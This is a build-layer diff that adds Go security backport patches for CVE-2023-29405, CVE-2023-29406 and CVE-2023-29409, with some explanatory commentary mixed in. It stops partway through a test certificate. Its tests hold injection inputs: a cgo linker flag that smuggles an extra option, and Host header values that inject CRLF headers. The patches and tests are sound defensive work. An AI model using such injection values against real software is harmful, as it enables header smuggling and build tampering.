+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+---
+Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/cmd/cgo/out.go | 4 +++-
+ src/cmd/go/internal/work/gccgo.go | 14 ++++++-------
+ .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
+ 3 files changed, 29 insertions(+), 9 deletions(-)
+ create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d26f9e76a374a..d0c6fe3d4c2c2 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
+
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
++ for _, arg := range v {
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
+ fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
+diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
+index 08a4c2d8166c7..a048b7f4eecef 100644
+--- a/src/cmd/go/internal/work/gccgo.go
++++ b/src/cmd/go/internal/work/gccgo.go
+@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
+ const ldflagsPrefix = "_CGO_LDFLAGS="
+ for _, line := range strings.Split(string(flags), "\n") {
+ if strings.HasPrefix(line, ldflagsPrefix) {
+- newFlags := strings.Fields(line[len(ldflagsPrefix):])
+- for _, flag := range newFlags {
+- // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
+- // but they don't mean anything to the linker so filter
+- // them out.
+- if flag != "-g" && !strings.HasPrefix(flag, "-O") {
+- cgoldflags = append(cgoldflags, flag)
+- }
++ flag := line[len(ldflagsPrefix):]
++ // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
++ // but they don't mean anything to the linker so filter
++ // them out.
++ if flag != "-g" && !strings.HasPrefix(flag, "-O") {
++ cgoldflags = append(cgoldflags, flag)
+ }
+ }
+ }
+diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+new file mode 100644
+index 0000000000000..4e91ae56505b6
+--- /dev/null
++++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+@@ -0,0 +1,20 @@
++# Test that #cgo LDFLAGS are properly quoted.
++# The #cgo LDFLAGS below should pass a string with spaces to -L,
++# as though searching a directory with a space in its name.
++# It should not pass --nosuchoption to the external linker.
++
++[!cgo] skip
++
++go build
++
++[!exec:gccgo] skip
++
++go build -compiler gccgo
++
++-- go.mod --
++module m
++-- cgo.go --
++package main
++// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
++import "C"
++func main() {}
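The out.go and gccgo.go hunks switch _cgo_flags from one space-joined line to one flag per line, so a flag containing an embedded space can no longer be re-split into extra linker arguments. A small sketch of the two serializations (illustrative only, not part of the patch):

package main

import (
	"fmt"
	"strings"
)

func main() {
	// One logical flag that itself contains a space, as in the added test case.
	ldflags := []string{"-L", "./ -Wl,--nosuchoption"}

	// Old format: everything joined onto one line; the gccgo link step then
	// re-split on whitespace and "recovered" three flags, including the
	// attacker-controlled --nosuchoption.
	oldLine := "_CGO_LDFLAGS=" + strings.Join(ldflags, " ")
	fmt.Printf("old file line: %q\n", oldLine)
	fmt.Printf("old re-split:  %q\n", strings.Fields(strings.TrimPrefix(oldLine, "_CGO_LDFLAGS=")))

	// New format: one flag per line, so no quoting and no re-splitting is needed.
	for _, arg := range ldflags {
		fmt.Printf("new file line: %q\n", "_CGO_LDFLAGS="+arg)
	}
}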
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
new file mode 100644
index 0000000000..369eca581e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
+From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Tue, 6 Jun 2023 12:51:17 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
+
+For #60306
+For #60514
+
+Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+---
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+
+ src/cmd/cgo/out.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d0c6fe3d4c2c2..a48f52105628a 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+ for _, arg := range v {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
+ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
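This follow-up restores the map key that the first backport dropped from the Fprintf call. A two-line sketch of what the missing operand does to the generated _cgo_flags content (illustrative only; the first call deliberately reproduces the bug and would be flagged by go vet):

package main

import "fmt"

func main() {
	k, arg := "LDFLAGS", "-lm"

	// The first backport dropped the map key, leaving two verbs but only one
	// operand, which fmt reports inline rather than failing:
	fmt.Printf("_CGO_%s=%s\n", arg) // _CGO_-lm=%!s(MISSING)

	// The follow-up restores the key so each line carries flag kind and value:
	fmt.Printf("_CGO_%s=%s\n", k, arg) // _CGO_LDFLAGS=-lm
}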
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
new file mode 100644
index 0000000000..080def4682
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
+From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 28 Jun 2023 13:20:08 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
+ sending
+
+Verify that the Host header we send is valid.
+Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
+adding an X-Evil header to HTTP/1 requests.
+
+Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
+header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
+the header and will go into a retry loop when the server rejects it.
+CL 506995 adds the necessary validation to x/net/http2.
+
+Updates #60374
+Fixes #61075
+For CVE-2023-29406
+
+Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
+Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
+Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
+CVE: CVE-2023-29406
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/http_test.go | 29 ---------------------
+ src/net/http/request.go | 47 ++++++++--------------------------
+ src/net/http/request_test.go | 11 ++------
+ src/net/http/transport_test.go | 18 +++++++++++++
+ 4 files changed, 31 insertions(+), 74 deletions(-)
+
+diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
+index f4ea52d..ea38cb4 100644
+--- a/src/net/http/http_test.go
++++ b/src/net/http/http_test.go
+@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
+ }
+ }
+
+-func TestCleanHost(t *testing.T) {
+- tests := []struct {
+- in, want string
+- }{
+- {"www.google.com", "www.google.com"},
+- {"www.google.com foo", "www.google.com"},
+- {"www.google.com/foo", "www.google.com"},
+- {" first character is a space", ""},
+- {"[1::6]:8080", "[1::6]:8080"},
+-
+- // Punycode:
+- {"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
+- {"bücher.de", "xn--bcher-kva.de"},
+- {"bücher.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we convert to lowercase before punycode:
+- {"BÜCHER.de", "xn--bcher-kva.de"},
+- {"BÜCHER.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we normalize to NFC before punycode:
+- {"gophér.nfc", "xn--gophr-esa.nfc"}, // NFC input; no work needed
+- {"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
+- }
+- for _, tt := range tests {
+- got := cleanHost(tt.in)
+- if tt.want != got {
+- t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
+- }
+- }
+-}
+-
+ // Test that cmd/go doesn't link in the HTTP server.
+ //
+ // This catches accidental dependencies between the HTTP transport and
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index cb2edd2..2706300 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -18,7 +18,6 @@ import (
+ "io/ioutil"
+ "mime"
+ "mime/multipart"
+- "net"
+ "net/http/httptrace"
+ "net/textproto"
+ "net/url"
+@@ -26,7 +25,8 @@ import (
+ "strconv"
+ "strings"
+ "sync"
+-
++
++ "golang.org/x/net/http/httpguts"
+ "golang.org/x/net/idna"
+ )
+
+@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ // is not given, use the host from the request URL.
+ //
+ // Clean the host, in case it arrives with unexpected stuff in it.
+- host := cleanHost(r.Host)
++ host := r.Host
+ if host == "" {
+ if r.URL == nil {
+ return errMissingHost
+ }
+- host = cleanHost(r.URL.Host)
++ host = r.URL.Host
++ }
++ host, err = httpguts.PunycodeHostPort(host)
++ if err != nil {
++ return err
++ }
++ if !httpguts.ValidHostHeader(host) {
++ return errors.New("http: invalid Host header")
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
+ return idna.Lookup.ToASCII(v)
+ }
+
+-// cleanHost cleans up the host sent in request's Host header.
+-//
+-// It both strips anything after '/' or ' ', and puts the value
+-// into Punycode form, if necessary.
+-//
+-// Ideally we'd clean the Host header according to the spec:
+-// https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
+-// https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
+-// https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
+-// But practically, what we are trying to avoid is the situation in
+-// issue 11206, where a malformed Host header used in the proxy context
+-// would create a bad request. So it is enough to just truncate at the
+-// first offending character.
+-func cleanHost(in string) string {
+- if i := strings.IndexAny(in, " /"); i != -1 {
+- in = in[:i]
+- }
+- host, port, err := net.SplitHostPort(in)
+- if err != nil { // input was just a host
+- a, err := idnaASCII(in)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return a
+- }
+- a, err := idnaASCII(host)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return net.JoinHostPort(a, port)
+-}
+-
+ // removeZone removes IPv6 zone identifier from host.
+ // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
+ func removeZone(host string) string {
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 461d66e..0d417ff 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
+ }
+ req.Host = "foo.com with spaces"
+ req.URL.Host = "foo.com with spaces"
+- req.Write(logWrites{t, &got})
+- want := []string{
+- "GET /after HTTP/1.1\r\n",
+- "Host: foo.com\r\n",
+- "User-Agent: " + DefaultUserAgent + "\r\n",
+- "\r\n",
+- }
+- if !reflect.DeepEqual(got, want) {
+- t.Errorf("Writes = %q\n Want = %q", got, want)
++ if err := req.Write(logWrites{t, &got}); err == nil {
++ t.Errorf("Writing request with invalid Host: succeded, want error")
+ }
+ }
+
+diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
+index fa0c370..0afb6b9 100644
+--- a/src/net/http/transport_test.go
++++ b/src/net/http/transport_test.go
+@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
+ t.Error(err)
+ }
+ }
++
++func TestRequestSanitization(t *testing.T) {
++ setParallel(t)
++ defer afterTest(t)
++
++ ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
++ if h, ok := req.Header["X-Evil"]; ok {
++ t.Errorf("request has X-Evil header: %q", h)
++ }
++ })).ts
++ defer ts.Close()
++ req, _ := NewRequest("GET", ts.URL, nil)
++ req.Host = "go.dev\r\nX-Evil:evil"
++ resp, _ := ts.Client().Do(req)
++ if resp != nil {
++ resp.Body.Close()
++ }
++}
+--
+2.25.1
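With this backport, Request.Write validates the Host header (after punycoding) instead of silently truncating it, so CR/LF can no longer smuggle extra headers into HTTP/1 requests. A small sketch, assuming a toolchain that carries the fix (illustrative only, not part of the patch):

package main

import (
	"bytes"
	"fmt"
	"net/http"
)

func main() {
	req, err := http.NewRequest("GET", "http://example.com/after", nil)
	if err != nil {
		panic(err)
	}
	// A Host containing CR/LF; before this change it was only truncated at the
	// first '/' or ' ', which still left the injected header on the wire.
	req.Host = "go.dev\r\nX-Evil:oops"

	var buf bytes.Buffer
	werr := req.Write(&buf)
	fmt.Println("write error:", werr)               // non-nil with this backport applied
	fmt.Printf("bytes written: %q\n", buf.String()) // no X-Evil header emitted
}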
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
new file mode 100644
index 0000000000..637f46a537
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
+From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 19 Jul 2023 10:30:46 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
+ invalid Host headers
+
+Historically, the Transport has silently truncated invalid
+Host headers at the first '/' or ' ' character. CL 506996 changed
+this behavior to reject invalid Host headers entirely.
+Unfortunately, Docker appears to rely on the previous behavior.
+
+When sending a HTTP/1 request with an invalid Host, send an empty
+Host header. This is safer than truncation: If you care about the
+Host, then you should get the one you set; if you don't care,
+then an empty Host should be fine.
+
+Continue to fully validate Host headers sent to a proxy,
+since proxies generally can't productively forward requests
+without a Host.
+
+For #60374
+Fixes #61431
+Fixes #61825
+
+Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
+Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
+Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
+CVE: CVE-2023-29406
+Signed-off-by: Ming Liu <liu.ming50@gmail.com>
+---
+ src/net/http/request.go | 23 ++++++++++++++++++++++-
+ src/net/http/request_test.go | 17 ++++++++++++-----
+ 2 files changed, 34 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index 3100037386..91cb8a66b9 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ if err != nil {
+ return err
+ }
++ // Validate that the Host header is a valid header in general,
++ // but don't validate the host itself. This is sufficient to avoid
++ // header or request smuggling via the Host field.
++ // The server can (and will, if it's a net/http server) reject
++ // the request if it doesn't consider the host valid.
+ if !httpguts.ValidHostHeader(host) {
+- return errors.New("http: invalid Host header")
++ // Historically, we would truncate the Host header after '/' or ' '.
++ // Some users have relied on this truncation to convert a network
++ // address such as Unix domain socket path into a valid, ignored
++ // Host header (see https://go.dev/issue/61431).
++ //
++ // We don't preserve the truncation, because sending an altered
++ // header field opens a smuggling vector. Instead, zero out the
++ // Host header entirely if it isn't valid. (An empty Host is valid;
++ // see RFC 9112 Section 3.2.)
++ //
++ // Return an error if we're sending to a proxy, since the proxy
++ // probably can't do anything useful with an empty Host header.
++ if !usingProxy {
++ host = ""
++ } else {
++ return errors.New("http: invalid Host header")
++ }
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index fddc85d6a9..dd1e2dc2a1 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
+ }
+ }
+
+-func TestRequestBadHost(t *testing.T) {
++func TestRequestBadHostHeader(t *testing.T) {
+ got := []string{}
+ req, err := NewRequest("GET", "http://foo/after", nil)
+ if err != nil {
+ t.Fatal(err)
+ }
+- req.Host = "foo.com with spaces"
+- req.URL.Host = "foo.com with spaces"
+- if err := req.Write(logWrites{t, &got}); err == nil {
+- t.Errorf("Writing request with invalid Host: succeded, want error")
++ req.Host = "foo.com\nnewline"
++ req.URL.Host = "foo.com\nnewline"
++ req.Write(logWrites{t, &got})
++ want := []string{
++ "GET /after HTTP/1.1\r\n",
++ "Host: \r\n",
++ "User-Agent: " + DefaultUserAgent + "\r\n",
++ "\r\n",
++ }
++ if !reflect.DeepEqual(got, want) {
++ t.Errorf("Writes = %q\n Want = %q", got, want)
+ }
+ }
+
+--
+2.34.1
+
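This follow-up relaxes the previous backport: for direct (non-proxy) requests an invalid Host is blanked rather than rejected, which keeps Docker-style uses working while still preventing header injection. A sketch of the resulting wire output, assuming a toolchain with both CVE-2023-29406 patches (illustrative only, not part of the patch):

package main

import (
	"bytes"
	"fmt"
	"net/http"
)

func main() {
	req, _ := http.NewRequest("GET", "http://foo/after", nil)
	req.Host = "foo.com\nnewline"
	req.URL.Host = "foo.com\nnewline"

	var buf bytes.Buffer
	if err := req.Write(&buf); err != nil {
		// Behaviour of the first backport alone: the request is rejected outright.
		fmt.Println("rejected:", err)
		return
	}
	// With this follow-up applied the invalid Host is blanked instead, so the
	// request still goes out but carries "Host: \r\n" and no injected header.
	fmt.Printf("%q\n", buf.String())
}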
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
+From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 7 Jun 2023 15:27:13 -0700
+Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
+ certificates to <= 8192 bits
+
+Extremely large RSA keys in certificate chains can cause a client/server
+to expend significant CPU time verifying signatures. Limit this by
+restricting the size of RSA keys transmitted during handshakes to <=
+8192 bits.
+
+Based on a survey of publicly trusted RSA keys, there are currently only
+three certificates in circulation with keys larger than this, and all
+three appear to be test certificates that are not actively deployed. It
+is possible there are larger keys in use in private PKIs, but we target
+the web PKI, so causing breakage here in the interests of increasing the
+default safety of users of crypto/tls seems reasonable.
+
+Thanks to Mateusz Poliwczak for reporting this issue.
+
+Updates #61460
+Fixes #61579
+Fixes CVE-2023-29409
+
+Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
+Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
+Run-TryBot: David Chase <drchase@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Bypass: David Chase <drchase@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
+CVE: CVE-2023-29409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/tls/handshake_client.go | 8 +++
+ src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
+ src/crypto/tls/handshake_server.go | 4 ++
+ 3 files changed, 90 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
+index 4fb528c..ba33ea1 100644
+--- a/src/crypto/tls/handshake_client.go
++++ b/src/crypto/tls/handshake_client.go
+@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
+ return nil
+ }
+
++// maxRSAKeySize is the maximum RSA key size in bits that we are willing
++// to verify the signatures of during a TLS handshake.
++const maxRSAKeySize = 8192
++
+ // verifyServerCertificate parses and verifies the provided chain, setting
+ // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
+ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse certificate from server: " + err.Error())
+ }
++ if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ certs[i] = cert
+ }
+
+diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
+index 6bd3c37..8d20b2b 100644
+--- a/src/crypto/tls/handshake_client_test.go
++++ b/src/crypto/tls/handshake_client_test.go
+@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
+ t.Errorf("Error expected, but no error returned")
+ }
+ }
++
++// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
++type discardConn struct {
++ net.Conn
++}
++
++func (dc *discardConn) Write(data []byte) (int, error) {
++ return len(data), nil
++}
++
++// largeRSAKeyCertPEM contains a 8193 bit RSA key
++const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
++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
